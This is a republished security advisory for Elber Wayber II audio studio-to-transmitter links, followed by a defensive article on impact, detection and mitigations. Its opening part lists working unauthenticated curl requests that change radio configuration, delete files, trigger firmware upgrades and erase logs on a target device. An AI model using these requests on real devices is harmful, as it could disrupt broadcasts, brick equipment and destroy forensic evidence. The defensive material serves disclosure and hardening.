Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2024-08-24

Elber Wayber Analog/Digital Audio STL 4.00 Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5823
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.

Elber Wayber Analog/Digital Audio STL 4.00 — Device Configuration Disclosure (ZSL-2024-5823)

This article summarizes a reported vulnerability affecting Elber S.r.l. Wayber II analog/digital audio STL units. It explains the nature and impact of the issue, practical risk scenarios, defensive detection techniques, and recommended mitigations and hardening measures for administrators and operators of broadcast links.

Vulnerability summary

Researchers reported that certain firmware and web interfaces in Elber Wayber II devices allow unauthenticated modification of device configuration and expose hidden client-side functionality. In practical terms, an unauthenticated network-level attacker who can reach the device's management interface may be able to change configuration parameters, trigger firmware operations, erase logs, or invoke internal routines that are intended only for maintenance or local use.

This class of problem is commonly described as an unauthenticated device configuration disclosure and hidden functionality exposure: management endpoints lack proper authentication/authorization and/or client-side code surfaces reveal privileged functions that can be invoked remotely.

Affected products and versions

Vendor	Product	Affected versions (examples)
Elber S.r.l.	Wayber II — Analog/Digital Audio STL	Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501), Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516), Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516 / 1501), Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350 / 1342), Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)

Technical impact (high level)

Unauthenticated configuration changes: An attacker able to reach the management endpoint could change operational parameters (frequency, audio routing, attenuation, etc.), potentially impacting broadcast content and service availability.
Remote operations abuse: Functions intended for maintenance (file delete, firmware upgrade trigger, log erase) could be invoked remotely, enabling disruption or attempts at persistent compromise.
Information disclosure: Hidden client-side functionality and endpoints can leak internal device behavior and increase the attacker’s ability to craft further attacks.

Realistic risk scenarios

Operational disruption — an attacker modifies output or mutes channels, causing service interruptions or degraded audio quality at transmit sites.
Cover-up of malicious activity — remote erasure of device logs could hamper incident investigation after an attack.
Firmware abuse — an adversary could attempt to force firmware upgrades or firmware-related operations to create a persistent foothold or brick devices.
Supply/chain risk — if management interfaces are exposed across multiple sites, a single compromise could scale to many transmitters.

Detection and monitoring guidance

Focus on identifying anomalous management actions and access patterns. Useful indicators include:

Unexpected configuration changes or parameter values on devices (frequency, mute status, gain, etc.).
Unexpected or out-of-window firmware operations and sudden firmware version changes.
Frequent or bulk log erasure events, especially timed shortly after other suspicious activity.
Administrative interface access originating from unexpected external IP ranges.
Unusual HTTP/HTTPS requests to management endpoints or elevated error rates on the web UI during off-hours.

Immediate mitigations and hardening (recommended)

Until vendor-provided patches or mitigations are available, apply these defensive controls to reduce exposure:

Network segmentation — place STL devices on a dedicated management VLAN that is not routable from the public internet. Only allow management access from approved jump hosts or a secure VPN.
Firewall rules — restrict inbound access to management ports to specific administrator IP addresses or networks.
Use authentication gateways — require access to management interfaces via an authenticated, audited bastion host or reverse proxy that enforces strong auth and logging.
Disable unused services — turn off web management or other protocols on devices when local access is sufficient, or bind management to local interfaces only.
Monitor and alert — create alerts on configuration changes, firmware upgrades, and log tampering.
Backups — maintain secure, offline backups of device configuration to allow rapid restoration after tampering.
Vendor coordination — contact Elber support for firmware updates, mitigations, and fixed releases; follow vendor advisories.

Example defensive configurations

Below are two defensive configuration examples intended for administrators: a firewall rule to restrict HTTP(S) management access and an example of putting the device behind an authenticated reverse proxy. These examples are defensive in nature and should be adapted to your environment and security policies.

# Example: Restrict management access to a single management network (iptables)
# Allow HTTP from admin network 192.0.2.0/24, drop other access to TCP 80
iptables -A INPUT -p tcp -s 192.0.2.0/24 --dport 80 -m conntrack --ctstate NEW -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Explanation: The first rule permits new TCP connections to port 80 only from the authorized management network (replace 192.0.2.0/24). The second rule drops all other attempts to reach port 80. Apply equivalent rules for HTTPS (port 443) or other management ports. Use your change control process when modifying firewall rules.

# Example: Minimal nginx reverse proxy fragment enforcing basic auth for device UI
location / {
    auth_basic "Restricted";
    auth_basic_user_file /etc/nginx/.htpasswd;
    proxy_pass http://192.0.2.123/;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $remote_addr;
}

Explanation: This nginx fragment requires HTTP Basic authentication to reach the device (backend at 192.0.2.123). The reverse proxy centralizes access control and logging; however, prefer stronger authentication (VPN, client certificates) over Basic Auth if possible. Secure the .htpasswd file and enforce TLS on the proxy.

Patch and remediation lifecycle

Work with the vendor to identify patched firmware and validate fixes in a test environment before deployment.
Apply patches according to your change-control windows, and verify device behavior after upgrade.
After patching, re-audit network exposure and disable any temporary mitigations that are no longer necessary.

Responsible disclosure and further reading

The issue was publicly reported by security researchers; operators should follow vendor advisories for fixed firmware and coordinated disclosure timelines. For more technical detail, consult official advisories from the vendor or the public advisory published by the reporting party. When contacting the vendor or external parties, provide device model, firmware revision, and observed behavior to aid triage.

Recommended next steps for operators

Inventory: identify all Wayber/Wayber II devices and their firmware revisions in your estate.
Contain: restrict management access immediately (network segmentation, firewall rules, VPN/bastion).
Patch: coordinate with Elber for fixed firmware and schedule updates.
Monitor: implement alerts for configuration changes, firmware events, and log erasure.
Prepare: ensure configuration backups and an incident response plan are in place.

By prioritizing network-level controls, strict access paths to management interfaces, timely patching, and vigilant monitoring, broadcast operators can significantly reduce the real-world risk posed by unauthenticated management vulnerabilities such as this one.